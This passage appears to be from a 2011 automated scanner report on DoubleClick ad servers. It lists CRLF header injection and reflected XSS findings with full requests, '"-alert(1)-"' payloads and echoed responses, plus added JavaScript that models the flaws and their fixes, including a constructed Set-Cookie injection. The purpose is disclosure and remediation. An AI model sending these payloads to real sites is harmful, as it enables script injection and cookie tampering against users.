Date: Wed, 06 Jul 2011 14:01:08 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

1.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9fae7%0d%0ae1ef4895d68 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9fae7%0d%0ae1ef4895d68/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9fae7
e1ef4895d68
/N3285.google/B2343920.122;sz=728x90;click=http: //adclick.g.doubleclick.net/aclk
Date: Wed, 06 Jul 2011 11:56:12 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>
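The block below is an added example, not DoubleClick code. It models the behaviour recorded in 1.1 and 1.2, where a URL-decoded path segment is concatenated into a Location header, shows what a client's header parser makes of the split response, and pairs the vulnerable builder with one that rejects the input. The host and path are taken from 1.2; the Set-Cookie segment is constructed to illustrate the impact of a header that the attacker gets to finish.

```javascript
// Added example (not DoubleClick code): CRLF in a path segment that is copied
// into a Location header, as in findings 1.1 and 1.2 of this report.

const CRLF = '\r\n';
const REDIRECT_BASE = 'http://static.2mdn.net/';

// Vulnerable pattern: the decoded path segment is concatenated into the header.
// The probe 9fae7%0d%0ae1ef4895d68 arrives URL-decoded, so the string already
// contains a raw CR LF when it reaches this function.
function buildRedirectVulnerable(segment, rest) {
  const location = REDIRECT_BASE + segment + rest;
  return 'HTTP/1.1 302 Moved Temporarily' + CRLF +
         'Location: ' + location + CRLF +
         'Content-Type: text/html' + CRLF + CRLF +
         '<h1>Error 302 Moved Temporarily</h1>';
}

// Hardened: the attacker-controlled segment must match an allow-list of path
// characters; anything else is rejected rather than "cleaned up".
const PATH_SEGMENT_RE = /^[A-Za-z0-9._~-]+$/;
function buildRedirectSafe(segment, rest) {
  if (!PATH_SEGMENT_RE.test(segment)) {
    throw new Error('redirect target contains characters outside the path allow-list');
  }
  return buildRedirectVulnerable(segment, rest); // same template, now with safe input
}

// Minimal view of what an HTTP client does with the raw bytes: split the head
// on CRLF, take the first line as the status line, parse the rest as
// "Name: value". Lines that do not fit that shape are collected separately.
function parseResponseHead(raw) {
  const head = raw.split(CRLF + CRLF)[0];
  const lines = head.split(CRLF);
  const headers = {};
  const malformed = [];
  for (const line of lines.slice(1)) {
    const colon = line.indexOf(':');
    if (colon === -1) { malformed.push(line); continue; }
    headers[line.slice(0, colon).trim().toLowerCase()] = line.slice(colon + 1).trim();
  }
  return { statusLine: lines[0], headers, malformed };
}

// Probe from finding 1.2, decoded the way the server saw it.
const PROBE_SEGMENT = decodeURIComponent('9fae7%0d%0ae1ef4895d68');
const REST = '/N3285.google/B2343920.122';
// Constructed: a segment that smuggles a complete extra header. The trusted
// remainder of the URL ends up as the cookie's Path attribute.
const COOKIE_SEGMENT = 'x' + CRLF + 'Set-Cookie: id=attacker-chosen; Path=';

function demo() {
  const probed = parseResponseHead(buildRedirectVulnerable(PROBE_SEGMENT, REST));
  const cookied = parseResponseHead(buildRedirectVulnerable(COOKIE_SEGMENT, REST));
  return {
    truncatedLocation: probed.headers.location,      // stops at "9fae7"
    strayLine: probed.malformed[0],                   // the rest of the probe
    injectedCookie: cookied.headers['set-cookie'],    // header the attacker wrote
  };
}

console.log(demo());
```

The allow-list is deliberately narrower than RFC 3986 allows for a path segment; the ad server only ever needs an alphanumeric creative identifier in that position, and rejecting is simpler to reason about than stripping or encoding control characters after the fact.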

2. Cross-site scripting (reflected)
There are 100 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences.

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.

User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
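The second layer above names HTML encoding, which is the right tool for reflections into HTML text such as 2.7 to 2.9 and 2.12 below, but not for the script-string reflections in 2.1 to 2.6, where the value lands inside a double-quoted JavaScript literal. The block below is an added example and not the code of any site in this report: it implements both encoders, runs the report's own probes through them, and uses a simplified stand-in for the escape("...") line in the DoubleClick responses (example.invalid is a placeholder host).

```javascript
// Added example: output encoding for the two reflection contexts in this
// report. Not the code of DoubleClick, adonmax or any other site listed here.

// HTML text or attribute context (2.7-2.9, 2.12): replace every HTML
// metacharacter with an entity so the parser never sees a tag or attribute
// boundary that came from the input.
const HTML_ENTITIES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;',
  "'": '&#x27;', '=': '&#x3D;', '/': '&#x2F;',
};
function htmlEncode(value) {
  return String(value).replace(/[&<>"'=\/]/g, c => HTML_ENTITIES[c]);
}

// JavaScript string-literal context (2.1-2.6): the browser does not decode
// entities inside <script>, so HTML encoding here corrupts the value instead
// of escaping it. Escape everything outside a small safe set as \xHH / \uHHHH,
// which neutralises the closing quote, the -alert(1)- call, and </script>.
function jsStringEncode(value) {
  return String(value).replace(/[^A-Za-z0-9 ,.\-_]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Simplified stand-in for the `url = escape("...&adurl=...")` line in the
// DoubleClick responses; example.invalid is a placeholder host.
function renderClickScriptVulnerable(adurl) {
  return 'url = escape("http://example.invalid/aclk?adurl=' + adurl + '");';
}
function renderClickScriptSafe(adurl) {
  return 'url = escape("http://example.invalid/aclk?adurl=' + jsStringEncode(adurl) + '");';
}

// Check: the template contains exactly one double-quoted literal, so a
// rendered line with anything other than two unescaped quotes means the
// input broke out of the string.
function stringLiteralIntact(script) {
  let quotes = 0;
  for (let i = 0; i < script.length; i++) {
    if (script[i] === '"' && script[i - 1] !== '\\') quotes++;
  }
  return quotes === 2;
}

// Payloads from findings 2.1 and 2.7.
const JS_PROBE = '439b8"-alert(1)-"4e414bdc8a7';
const HTML_PROBE = 'd4501<script>alert(1)</script>6546b61c730';

function demo() {
  return {
    htmlEncoded: htmlEncode(HTML_PROBE),
    jsEncoded: jsStringEncode(JS_PROBE),
    vulnerableLiteralIntact: stringLiteralIntact(renderClickScriptVulnerable(JS_PROBE)),
    safeLiteralIntact: stringLiteralIntact(renderClickScriptSafe(JS_PROBE)),
  };
}

console.log(demo());
```

For a whole value rather than a fragment, JSON.stringify of the value (followed by HTML-safe escaping of < and & when the script is inline) is the usual shortcut for the JavaScript context; the hand-written encoder above is shown so the difference from entity encoding is visible.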


2.1. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [adurl parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the adurl request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 439b8"-alert(1)-"4e414bdc8a7 was submitted in the adurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4883
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 06 Jul 2011 11:56:12 GMT
Expires: Wed, 06 Jul 2011 11:56:12 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=439b8"-alert(1)-"4e414bdc8a7https://www.lowermybills.com/lending/home-refinance/?sourceid=55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "false";
var winW = 7
...[SNIP]...

2.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [ai parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the ai request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 78e9e"-alert(1)-"df15dde4672 was submitted in the ai parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:42 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
BCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE78e9e"-alert(1)-"df15dde4672&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "op
...[SNIP]...

2.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [client parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the client request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f014"-alert(1)-"d85abfc7b06 was submitted in the client parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:56:11 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
hc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-40638789337809127f014"-alert(1)-"d85abfc7b06&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";
var openWindow = "fal
...[SNIP]...

2.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [num parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the num request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 36475"-alert(1)-"4e6b3b90217 was submitted in the num parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4903
Date: Wed, 06 Jul 2011 11:55:52 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
GZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=136475"-alert(1)-"4e6b3b90217&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=https%3a%2f%2fwww.lowermybills.com/lending/home-refinance/%3Fsourceid%3D55400195-231248095-42254076");
var wmode = "opaque";
...[SNIP]...

2.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 [sig parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3285.google/B2343920.122

Issue detail

The value of the sig request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2b7d2"-alert(1)-"e1bf4c111b8 was submitted in the sig parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA2b7d2"-alert(1)-"e1bf4c111b8&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 4922
Date: Wed, 06 Jul 2011 11:56:01 GMT

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 2593 Template Name = Banner Creative (Flash) - In Page --
...[SNIP]...
